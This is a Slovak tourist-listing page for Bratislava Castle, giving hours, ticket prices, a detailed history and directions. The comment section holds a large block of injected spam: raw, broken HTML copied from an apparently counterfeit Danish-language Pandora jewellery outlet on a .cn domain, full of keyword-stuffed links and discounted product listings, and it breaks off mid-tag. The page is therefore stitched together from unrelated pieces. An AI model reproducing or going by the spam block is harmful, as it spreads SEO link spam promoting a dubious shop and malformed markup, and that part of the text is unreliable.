baner
Hodnotenie
Mapa

Bratislavský hrad

Región
Bratislavský
Miesto
Zámocká, Bratislava
Web

Otváracie hodiny:

1. január  31. marec: 9.00 až 17.00 hod; v pondelok zatvorené; posledný vstup 16.00
1. apríl  16. november: 10.00 až 18.00 hod; v pondelok zatvorené; posledný vstup 17.00
17. november  31. december: 9.00 až 17.00 hod; v pondelok zatvorené; posledný vstup 16.00

Cenník:

Prehliadku hradu je možné absolvovať v dvoch variantoch:
Okruh A
prehliadka klenotnice a hradu
Okruh B
  prehliadka klenotnice

Platí nasledovné vstupné: 

Dospelí  
7 €  Okruh A    
2 €  Okruh B
Žiaci a študenti    
4 €  Okruh A    
1 €  Okruh B
Seniori                   
4 €  Okruh A                  
1 €  Okruh B
Školská skupina                        
2 € *     
Klienti poštovej banky    
5,60 €  Okruh A   
1,60 €  Okruh B

Možnosť využiť aj lektora:
1. V slovenskom jazyku 10 € za skupinu
2. V anglickom alebo nemeckom jazyku 15 € za skupinu

Popis:

Monumentálny Bratislavský hrad týčiaci sa na Dunajom je neodmysliteľnou súčasťou krajinnej scenérie Bratislavy, ktorá je zobrazená v stovkách rytín, obrazov, ako aj starých či nových pohľadníc. Je viditeľný z veľkej diaľky a jeho výraznú siluetu zbadá každý návštevník Bratislavy.

Majestátny Bratislavský hrad stojí na výraznom hradnom vrchu, ktorý vystupuje do výšky 85 m nad hladinu rieky Dunaj. Jeho silueta pripomínajúca stôl otočený hore nohami je najlepšie viditeľná predovšetkým z južnej a západnej strany. Poloha hradu nie je náhodná, pretože hradný kopec už oddávna poskytoval bezpečné miesto a bol kontinuálne osídlený. Výšina nad dunajským brodom a križovatkou diaľkových ciest bola osídlená už od praveku. V 9. storočí tu vzniklo veľkomoravské hradisko, správne centrum svetskej moci, stredisko cirkevnej organizácie a dôležitý obranný objekt opevnený valom, ktorý sa ťahal po hrane plošiny hradného kopca. Pod menom Brezalauspurc sa spomína k roku 907 v Salzburských análoch v súvislosti s bitkou Bavorov a starých Maďarov, ktorá bola predzvesťou definitívneho zániku Veľkej Moravy. Táto pevnosť, doplnená o nové stavby, si zachovala závažnosť aj po začlenení územia Slovenska do uhorského štátu ako dôležitý komitátny hrad a najvýznamnejší bod arpádovskej moci na západnej hranici krajiny.

Bratislavský hrad nedobyli ani tatárske hordy, ktoré plienili krajinu v rokoch 1241 – 1242. V tomto období prišlo v Uhorsku k významnej zemne v budovaní hradov. Začali sa stavať kamenné pevnosti podľa osvedčených západných vzorov. Už v roku 1245 kráľ Belo IV. odmenil skupinu jobagiónov z bratislavskej hradnej posádky za to, že na mieste starších palácov postavili veľkú hranolovú obytnú vežu, zárodok ranogotického hradu, ktorý bol v roku 1261 svedkom svadby českého kráľa Přemysla Otakara II. s princeznou Kunigundou, vnučkou uhorského panovníka Bela IV., a do konca 13. storočia aj miestom bojov počas uhorsko-českých vojen a v konflikte uhorského kráľa s rakúskym vojvodom Albrechtom I.

Smrťou Ľudovíta I. v roku 1382 sa v Uhorsku skončilo obdobie konsolidovanej vlády Anjouovcov a vystriedala ho etapa dynastických bojov. Jednému z kandidátov na uhorský trón, Žigmundovi Luxemburskému, snúbencovi novej uhorskej kráľovnej Márie, prišli so svojimi vojskami na pomoc jeho bratanci, moravskí markgrófi Prokop a Jošt. Žigmund im na krytie výdavkov dal do zálohu rozsiahle územie s mnohými hradmi, medzi ktorými nechýbal ani Bratislavský hrad.

Žigmund Luxemburský bol v roku 1387 korunovaný za uhorského kráľa a neskôr, keď sa stal aj rímskym cisárom, si zvolil Bratislavský hrad za jednu zo svojich troch hlavných rezidencií. Bratislavskí župani bratia Rozgonyiovci už v 20. rokoch 15. storočia dali po obvode dávneho valu stavať murované hradby. Po roku 1431 zbúrali aj starú obytnú vežu (dnes sčasti vyznačenú v dlažbe nádvoria paláca) a ranogotický hrad nahradili honosným objektom so štvorkrídlovou dispozíciou talianskeho kastela, ktorému dominovala zachovaná starobylá obranná veža včlenená do juhozápadného nárožia – budúca Korunná veža. Ucelenejšiu predstavu o výtvarnom riešení tejto neskorogotickej pevnosti poskytuje Žigmundova brána, ktorá pretrvala neskoršie zmeny bezmála v pôvodnej podobe.

Na konci augusta roku 1526 uhorské vojská v bitke s Osmanmi utrpeli na moháčskych poliach zdrvujúcu porážku a na úteku z bojiska zahynul aj kráľ Ľudovít II. Jagelovský. Panovnícky dvor sa podľa pokynu domysleného pre takúto krajnosť presídlil z Budína na Bratislavský hrad. Novým panovníkom krajiny sa stal rakúsky arcivojvoda Ferdinand a hrad nad Dunajom sa odvtedy stal trvalou doménou Habsburgovcov. Kým po celý stredovek chránil Uhorsko proti útokom zo západu, teraz nadobudol význam záštity Viedne pred Osmanskou expanziou. Bratislava sa stala centrom politického i cirkevného života krajiny a korunovačným mestom uhorských kráľov. Týmto zmeneným podmienkam prispôsobili stavebne a výtvarne aj hrad.

V roku 1619 vypuklo druhé zo série protihabsburských povstaní v Uhorsku. Sedmohradské knieža Gabriel Bethlen s početnou armádou v polovici októbra obsadil Bratislavu, zmocnil sa hradu i korunovačných pokladov uložených v Korunnej veži. Povstalci sa tu udržali až do mája roku 1621, keď cisársky generál Buquoy s podporou ťažkého delostrelectva dobyl hrad a Bethlen bol napokon donútený podpísať v Mikulove mier. V tom čase boli už večnými županmi Bratislavskej stolice a dedičnými kapitánmi hradu Pálffyovci. Keď hrad poškodený v bojoch a vypálený bleskom vyhlásil v roku 1635 snem za neobývateľný, Pavol Pálffy prijal poverenie na jeho opravu a modernizáciu. Pri prestavbe realizovanej v rokoch 1635 až 1649 získal hrad svoju nezameniteľnú siluetu. Palác vtedy zvýšili o tretie poschodie, zastrešili ho sedlovými strechami a ťažkú hmotu Korunnej veže vyvážili nadstavbou pozorovacích vežičiek na zvyšných nárožiach.

Situácia sa zmenila po rozhodnej porážke Osmanov pri Viedni v roku 1683. Po nej boli Turci donútení k ústupu z krajiny a Bratislavský hrad stratil svoje obranné poslanie. Za vlády Márie Terézie prešiel rozsiahlou prestavbou podľa projektov najlepších cisárskych architektov, ktorí hrad premenili na reprezentačné sídlo uhorského miestodržiteľa. V roku 1765 cisárovná vymenovala do tejto funkcie svojho zaťa arcivojvodu Alberta. Mnohé stavby, ktoré slúžili potrebám jeho veľkého dvora zanikli. Pripomienkou tých čias je napríklad široké schodisko paláca vyzdobené pozlátenými rokokovými štukami, čestné nádvorie pred vstupom do paláca alebo replika barokových hospodárskych budov postavených v nedávnych rokoch na západnej terase.

V roku 1780 cisárovná Mária Terézia zomrela. Miestodržiteľ vzápätí opustil Bratislavu a z hradu odviezol bohaté zbierky obrazov, medirytín, zbraní, porcelánu i vzácnych kníh, ktoré dnes tvoria časť kolekcie viedenského Albertina. Premiestnili aj korunovačné klenoty a rozpustili strážny oddiel. Opustený hrad prichýlil na prechodnú dobu ústredný seminár katolíckeho duchovenstva, v ktorom mladý seminarista Anton Bernolák položil svojou prácou základ prvej kodifikácie slovenského jazyka. Neskôr budovy adaptovali na kasárne. V ranných hodinách 28. mája 1811 vypukol vo vojenskom sklade požiar.

Celých 150 rokov sa nič nedialo s obrovskými ruinami zhoreného hradného paláca. Armáda, ktorá zhorenisko naďalej užívala, časti zachovalého muriva rozoberala a predávala ako stavebný materiál. Vojsko čiastočne využívalo niektoré objekty v hradnom areáli, ktorým sa ničivé plamene v roku 1811 vyhli. Slúžili aj ako kasárne. V roku 1918 sa stali dejiskom vzbury slovenských vojakov 72. pešieho pluku, ktorí odmietli bojovať v službách monarchie. Po prvej svetovej vojne sa začalo intenzívne diskutovať e o ďalšom osude ruín Bratislavského hradu, avšak až po druhej svetovej vojne sa hrad predsa len dočkal zmysluplnej obnovy. Zásluhu mal na tom popredný slovenský maliar Janko Alexy (1894 – 1970). Jeho úsilie vynaložené v prospech dobrej veci ocenili pamätnou tabuľou s umelcovou bustou umiestnenou na južnom krídle hradného nádvoria. V roku 1953 sa prof. Alfréd Piffl so svojimi spolupracovníkmi pustil do prieskumu zrúcaniny a do čiastočnej konzervácie najohrozenejších múrov. Jeho úsilie po roku 1956 prerástlo do rozsiahlej rekonštrukcie hradu. Najvýznamnejšia etapa pamiatkovej obnovy hradu sa zavŕšila v roku 1968. Vtedy sa ukončila rekonštrukcia hradného paláca. Tento termín nebol celkom náhodný. Palác mal byť  pripravený na to, aby sa v jednej z jeho siení na prvom poschodí mohol 28. októbra slávnostne podpísať zákon o československej federácii. Túto udalosť pripomína trojica líp zasadená blízko veľkomoravskej baziliky, v južnom rohu východnej terasy. Do novodobej histórie Slovenska sa zapísal Bratislavský hrad ako hostiteľské miesto summitu amerického prezidenta G. Busha a ruského prezidenta V. Putina. Obaja prezidenti sa pri svojej návšteve Bratislavy stretli v klenotnici hradu na rokovaní 24. februára 2005. Obnova Bratislavského hradu pokračovala až do roku 2012 a hrad by mal opäť plniť funkciu mimoriadne atraktívneho oddychového miesta všetkých Bratislavčanov.

Ústrednou stavbou Bratislavského hradu je štvorkrídlový palác, ktorého súčasťou je aj nárožná, v jadre neskororománska veža, podľa neskoršej funkcie nazývaná Korunnou vežou. Z nádvoria paláca je vstup do podzemného priestoru so studňou a cisternou. Priestor pre palácom zaberá čestné nádvorie ohraničené párom víťazných brána a strážnicami cisárskej gardy. Pri paláci na východnej terase je možné vidieť náznakovo rekonštruované zvyšky veľkomoravskej baziliky, Kostola najsvätejšieho Salvatora z 11. storočia a iných stavieb z tohto obdobia. Opevnené predhradie zabezpečovala na východe bašta Lugisland, pri ktorej sa zachovala výpadová bránka, na severe ďalšia delová bašta a na juhu sústava hrotitých bastiónov. Areál hradu sprístupňuje Žigmundova brána, ale tiež Leopoldova brána otvorená v hmote juhozápadného bastiónu a baroková Viedenská brána, ktorá tvorí hlavný vstup do hradu. V priestore predhradia sa nachádzajú upravené budovy dôstojníckych bytov, postavené v priestore juhovýchodného bastiónu, a ďalšie stavby slúžiace pôvodne na ubytovanie vojska a čeľade, ale aj stajne či hospodárske a prevádzkové objekty. Takémuto účelu slúžila aj postavená replika barokových budov na západnej terase.

V areáli Bratislavského hradu boli do rekonštrukcie, ktorá začala v apríli 2008 viaceré priestory prístupné verejnosti. Boli v nich umiestnené rôzne krátkodobé výstavy, ako aj stále expozície Slovenského národného múzea. Po rekonštrukcii sa do hradu opäť vrátili. Súčasťou areálu hradu je aj park, kde sú viditeľné základy veľkomoravskej baziliky. Počas prechádzky parkom sa návštevníkom naskytnú rôzne pohľady na Bratislavu a uvidia aj nenápadnú sochu sv. Alžbety, ktorá sa v roku 1207 na Bratislavskom hrade narodila. Ešte krajší výhľad na Bratislavu a jej okolie je však z najstaršej Korunnej veže.

Prechádzka na hrad je dnes súčasťou každej exkurznej trasy po Bratislave. Najčastejšie sa začína od Dómu sv. Martina, od ktorého prejdeme popod Nový most na druhú stanu frekventovanej cestnej komunikácie a po Zámockých schodoch vystúpime k Žigmundovej bráne. Motoristi k hradu najčastejšie smerujú cez ulicu Palisády, ktorou sa dostanú až ku parkovisku pri hrade a pešo vojdú do areáli hradu cez Viedenskú bránu.

Ako sa sem dostanete:

Prechádzka na hrad je dnes súčasťou každej exkurznej trasy po Bratislave. Najčastejšie sa začína od Dómu sv. Martina, od ktorého prejdeme popod Nový most na druhú stanu frekventovanej cestnej komunikácie a po Zámockých schodoch vystúpime k Žigmundovej bráne. Motoristi k hradu najčastejšie smerujú cez ulicu Palisády, ktorou sa dostanú až ku parkovisku pri hrade a pešo vojdú do areáli hradu cez Viedenskú bránu.

MHD: Vystúpte z autobusu na zastávke Hrad alebo Zámocká, ktoré sú najbližšie k hradu.
Hodnotenie prevádzky

Hodnotenie
Odoslať komentár
[b][url=http://www.outletpandora.cn/da/pandora-perler-c-4.html]p<strong><a href="http://www.outletpandora.cn/da/pandora-perler-c-4.html">pandora perler billige</a></strong><br> <strong><a href="http://www.outletpandora.cn/da/pandora-perler-c-4.html">pandora perler dicount</a></strong><br>
<ul><li><strong><a href="http://www.outletpandora.cn/da/pandora-halsk%C3%A6der-c-16.html">pandora halskæder og armbånd</a></strong></li><li><strong><a href="http://www.outletpandora.cn/da/pandora-halsk%C3%A6der-c-16.html">pandora halskæder</a></strong></li><li><strong><a href="http://www.outletpandora.cn/da/pandora-halsk%C3%A6der-c-16.html">pandora halskæder til salg</a></strong></li></ul><br> <title>øreringe</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="keywords" content="øreringe" /> <meta name="description" content="" /> <meta http-equiv="imagetoolbar" content="no" /> <base href="http://www.outletpandora.cn/da/" /> <link rel="canonical" href="http://www.outletpandora.cn/da/pandora-Øreringe-c-13.html" /> <link rel="stylesheet" type="text/css" href="http://www.outletpandora.cn/da/includes/templates/polo/css/style_imagehover.css" /> <link rel="stylesheet" type="text/css" href="http://www.outletpandora.cn/da/includes/templates/polo/css/stylesheet.css" /> <link rel="stylesheet" type="text/css" href="http://www.outletpandora.cn/da/includes/templates/polo/css/stylesheet_css_buttons.css" /> <link rel="stylesheet" type="text/css" media="print" href="http://www.outletpandora.cn/da/includes/templates/polo/css/print_stylesheet.css" /> <select name="currency" onchange="this.form.submit();"> <option value="USD">US Dollar</option> <option value="EUR">Euro</option> <option value="GBP">GB Pound</option> <option value="CAD">Canadian Dollar</option> <option value="AUD">Australian Dollar</option> <option value="JPY">Jappen Yen</option> <option value="NOK">Norske Krone</option> <option value="SEK">Swedish Krone</option> <option value="DKK" selected="selected">Danish Krone</option> <option value="CNY">CNY</option> </select> <input type="hidden" name="main_page" value="index" /><input type="hidden" name="cPath" value="13" /></form></div></div> <div class="leftBoxContainer" id="categories" style="width: 220px"> <div class="sidebox-header-left main-sidebox-header-left"><h3 class="leftBoxHeading main-sidebox-header-right" id="categoriesHeading">Kategorier</h3></div> <div id="categoriesContent" class="sideBoxContent"> <div class="categories-top-list no-dots"><a class="category-top" href="http://www.outletpandora.cn/da/pandora-halsk%C3%A6der-c-16.html">Pandora Halskæder</a></div> <div class="categories-top-list "><a class="category-top" href="http://www.outletpandora.cn/da/pandora-armb%C3%A5nd-c-1.html">Pandora Armbånd</a></div> <div class="categories-top-list "><a class="category-top" href="http://www.outletpandora.cn/da/pandora-perler-c-4.html">Pandora perler</a></div> <div class="categories-top-list "><a class="category-top" href="http://www.outletpandora.cn/da/pandora-ringe-c-12.html">Pandora Ringe</a></div> <div class="categories-top-list "><a class="category-top" href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html"><span class="category-subs-parent">Pandora Øreringe</span></a></div> <div class="subcategory"><a class="category-products" href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-pandora-compose-%C3%98reringe-c-13_15.html">Pandora Compose Øreringe</a></div> <div class="subcategory"><a class="category-products" href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-pandora-%C3%98reringe-c-13_14.html">Pandora Øreringe</a></div> </div></div> <div class="leftBoxContainer" id="featured" style="width: 220px"> <div class="sidebox-header-left "><h3 class="leftBoxHeading " id="featuredHeading">Featured - <a href="http://www.outletpandora.cn/da/featured_products.html">&nbsp;&nbsp;[mere]</a></h3></div> <div class="sideBoxContent centeredContent"><a href="http://www.outletpandora.cn/da/studs-love-takes-flight-290547-p-1063.html"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/Studs-Love-Takes-Flight-290547.jpg" alt="Studs Love Takes Flight - 290.547" title=" Studs Love Takes Flight - 290.547 " width="130" height="124" /></a><a class="sidebox-products" href="http://www.outletpandora.cn/da/studs-love-takes-flight-290547-p-1063.html">Studs Love Takes Flight - 290.547</a><div><span class="normalprice">DKK 332 </span>&nbsp;<span class="productSpecialPrice">DKK 325</span><span class="productPriceDiscount"><br />Spar:&nbsp;2% off</span></div></div><div class="sideBoxContent centeredContent"><a href="http://www.outletpandora.cn/da/charms-vintage-allure-med-14k-gr%C3%B8n-syntetisk-spinel-290678ss-p-1014.html"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/Charms-Vintage-Allure-with-14K-amp-Green.jpg" alt="Charms Vintage Allure med 14K & Grøn Syntetisk Spinel - 290678SS" title=" Charms Vintage Allure med 14K & Grøn Syntetisk Spinel - 290678SS " width="130" height="124" /></a><a class="sidebox-products" href="http://www.outletpandora.cn/da/charms-vintage-allure-med-14k-gr%C3%B8n-syntetisk-spinel-290678ss-p-1014.html">Charms Vintage Allure med 14K & Grøn Syntetisk Spinel - 290678SS</a><div><span class="normalprice">DKK 3,316 </span>&nbsp;<span class="productSpecialPrice">DKK 1,961</span><span class="productPriceDiscount"><br />Spar:&nbsp;41% off</span></div></div><div class="sideBoxContent centeredContent"><a href="http://www.outletpandora.cn/da/sterling-s%C3%B8lv-glad-lille-fugl-790424-p-544.html"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Beads/Sterling-Silver-Happy-Little-Bird-790424.jpg" alt="Sterling Sølv glad lille Fugl - 790.424" title=" Sterling Sølv glad lille Fugl - 790.424 " width="130" height="124" /></a><a class="sidebox-products" href="http://www.outletpandora.cn/da/sterling-s%C3%B8lv-glad-lille-fugl-790424-p-544.html">Sterling Sølv glad lille Fugl - 790.424</a><div><span class="normalprice">DKK 529 </span>&nbsp;<span class="productSpecialPrice">DKK 325</span><span class="productPriceDiscount"><br />Spar:&nbsp;39% off</span></div></div></div> </div> <div id ="pic" <a href="http://www.outletpandora.cn/da/"><img src="http://www.outletpandora.cn/da/includes/templates/polo/images/pic01.gif" width="220" border="0"></a> </br> <a href="http://www.outletpandora.cn/da/"><img src="http://www.outletpandora.cn/da/includes/templates/polo/images/pic02.gif" width="220" border="0"></a> </div> </td> <td id="columnCenter" valign="top"> <div id="navBreadCrumb"> <a href="http://www.outletpandora.cn/da/">Hjem</a>&nbsp;::&nbsp; Pandora Øreringe </div> <div class="centerColumn" id="indexProductList"> <h1 id="productListHeading">Pandora Øreringe</h1> <form name="filter" action="http://www.outletpandora.cn/da/" method="get"><label class="inputLabel">Filter Results by:</label><input type="hidden" name="main_page" value="index" /><input type="hidden" name="cPath" value="13" /><input type="hidden" name="sort" value="20a" /><select name="alpha_filter_id" onchange="this.form.submit()"> <option value="0">Items starting with ...</option> <option value="65">A</option> <option value="66">B</option> <option value="67">C</option> <option value="68">D</option> <option value="69">E</option> <option value="70">F</option> <option value="71">G</option> <option value="72">H</option> <option value="73">I</option> <option value="74">J</option> <option value="75">K</option> <option value="76">L</option> <option value="77">M</option> <option value="78">N</option> <option value="79">O</option> <option value="80">P</option> <option value="81">Q</option> <option value="82">R</option> <option value="83">S</option> <option value="84">T</option> <option value="85">U</option> <option value="86">V</option> <option value="87">W</option> <option value="88">X</option> <option value="89">Y</option> <option value="90">Z</option> <option value="48">0</option> <option value="49">1</option> <option value="50">2</option> <option value="51">3</option> <option value="52">4</option> <option value="53">5</option> <option value="54">6</option> <option value="55">7</option> <option value="56">8</option> <option value="57">9</option> </select> </form> <br class="clearBoth" /> <div id="productListing"> <div id="productsListingTopNumber" class="navSplitPagesResult back">Viser <strong>1</strong> til <strong>24</strong> (ud af <strong>92</strong> produkter)</div> <div id="productsListingListingTopLinks" class="navSplitPagesLinks forward"> &nbsp;<strong class="current">1</strong>&nbsp;&nbsp;<a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?page=2&sort=20a" title=" Side 2 ">2</a>&nbsp;&nbsp;<a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?page=3&sort=20a" title=" Side 3 ">3</a>&nbsp;&nbsp;<a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?page=4&sort=20a" title=" Side 4 ">4</a>&nbsp;&nbsp;<a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?page=2&sort=20a" title=" N&aelig;ste side ">[N&aelig;ste&nbsp;&gt;&gt;]</a>&nbsp;</div> <br class="clearBoth" /> <div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/14k-charm-drop-med-onyx-250434on-p-983.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/14K-Charm-Drop-with-Onyx-250434ON.jpg" alt="14K Charm Drop med Onyx - 250434ON" title=" 14K Charm Drop med Onyx - 250434ON " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/14k-charm-drop-med-onyx-250434on-p-983.html">14K Charm Drop med Onyx - 250434ON</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 1,884 </span>&nbsp;<span class="productSpecialPrice">DKK 1,524</span><span class="productPriceDiscount"><br />Spar:&nbsp;19% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=983&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/14k-charm-drop-peacock-pearl-med-black-diamond-250444db-p-977.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/14K-Charm-Drop-Peacock-Pearl-with-Black-Diamond.jpg" alt="14K Charm Drop Peacock Pearl med Black Diamond - 250444DB" title=" 14K Charm Drop Peacock Pearl med Black Diamond - 250444DB " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/14k-charm-drop-peacock-pearl-med-black-diamond-250444db-p-977.html">14K Charm Drop Peacock Pearl med Black Diamond - 250444DB</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 1,531 </span>&nbsp;<span class="productSpecialPrice">DKK 1,284</span><span class="productPriceDiscount"><br />Spar:&nbsp;16% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=977&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/14k-charm-drop-pearl-med-diamond-250444d-p-979.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/14K-Charm-Drop-Pearl-with-Diamond-250444D.jpg" alt="14K Charm Drop Pearl med Diamond - 250444D" title=" 14K Charm Drop Pearl med Diamond - 250444D " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/14k-charm-drop-pearl-med-diamond-250444d-p-979.html">14K Charm Drop Pearl med Diamond - 250444D</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 2,589 </span>&nbsp;<span class="productSpecialPrice">DKK 1,721</span><span class="productPriceDiscount"><br />Spar:&nbsp;34% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=979&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <br class="clearBoth" /><div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/14k-charm-hoop-twisted-teardrop-250432-p-980.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/14K-Charm-Hoop-Twisted-Teardrop-250432.jpg" alt="14K Charm Hoop Twisted Teardrop - 250432" title=" 14K Charm Hoop Twisted Teardrop - 250432 " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/14k-charm-hoop-twisted-teardrop-250432-p-980.html">14K Charm Hoop Twisted Teardrop - 250432</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 5,263 </span>&nbsp;<span class="productSpecialPrice">DKK 3,020</span><span class="productPriceDiscount"><br />Spar:&nbsp;43% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=980&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/14k-hoop-small-round-glat-250442-p-981.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/14K-Hoop-Small-Round-Smooth-250442.jpg" alt="14K Hoop Small Round Glat - 250.442" title=" 14K Hoop Small Round Glat - 250.442 " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/14k-hoop-small-round-glat-250442-p-981.html">14K Hoop Small Round Glat - 250.442</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 2,751 </span>&nbsp;<span class="productSpecialPrice">DKK 1,912</span><span class="productPriceDiscount"><br />Spar:&nbsp;31% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=981&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/14k-medium-indl%C3%A6g-glat-250402-p-984.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/14K-Medium-Post-Smooth-250402.jpg" alt="14K Medium Indlæg Glat - 250.402" title=" 14K Medium Indlæg Glat - 250.402 " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/14k-medium-indl%C3%A6g-glat-250402-p-984.html">14K Medium Indlæg Glat - 250.402</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 1,065 </span>&nbsp;<span class="productSpecialPrice">DKK 783</span><span class="productPriceDiscount"><br />Spar:&nbsp;26% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=984&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <br class="clearBoth" /><div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/autumn-breeze-dangle-med-smoky-quartz-290529sq-p-985.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/Autumn-Breeze-Dangle-with-Smoky-Quartz-290529SQ.jpg" alt="Autumn Breeze Dangle med Smoky Quartz - 290529SQ" title=" Autumn Breeze Dangle med Smoky Quartz - 290529SQ " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/autumn-breeze-dangle-med-smoky-quartz-290529sq-p-985.html">Autumn Breeze Dangle med Smoky Quartz - 290529SQ</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 1,249 </span>&nbsp;<span class="productSpecialPrice">DKK 825</span><span class="productPriceDiscount"><br />Spar:&nbsp;34% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=985&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/be-my-valentine-stud-med-clear-cubic-zirconia-290528cz-p-986.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/Be-My-Valentine-Stud-with-Clear-Cubic-Zirconia.jpg" alt="Be My Valentine Stud med Clear Cubic Zirconia - 290528CZ" title=" Be My Valentine Stud med Clear Cubic Zirconia - 290528CZ " width="200" height="150" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.outletpandora.cn/da/be-my-valentine-stud-med-clear-cubic-zirconia-290528cz-p-986.html">Be My Valentine Stud med Clear Cubic Zirconia - 290528CZ</a></h3><div class="listingDescription"></div><br /><span class="normalprice">DKK 621 </span>&nbsp;<span class="productSpecialPrice">DKK 367</span><span class="productPriceDiscount"><br />Spar:&nbsp;41% off</span><br /><br /><a href="http://www.outletpandora.cn/da/pandora-%C3%98reringe-c-13.html?products_id=986&action=buy_now&sort=20a"><img src="http://www.outletpandora.cn/da/includes/templates/polo/buttons/danish/button_buy_now.gif" alt="Buy Now" title=" Buy Now " width="105" height="24" class="listingBuyNowButton" /></a><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:30.5%;"><a href="http://www.outletpandora.cn/da/charm-barrel-291002-p-989.html"><div style="vertical-align: middle;height:191px"><img src="http://www.outletpandora.cn/da/images/_small//pandora01_jewelry_/Earrings/Charm-Barrel-291002.jpg" alt="Charm Barrel - 291.002" title=" Charm Barrel - 291.002 " width="200" height="191" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a 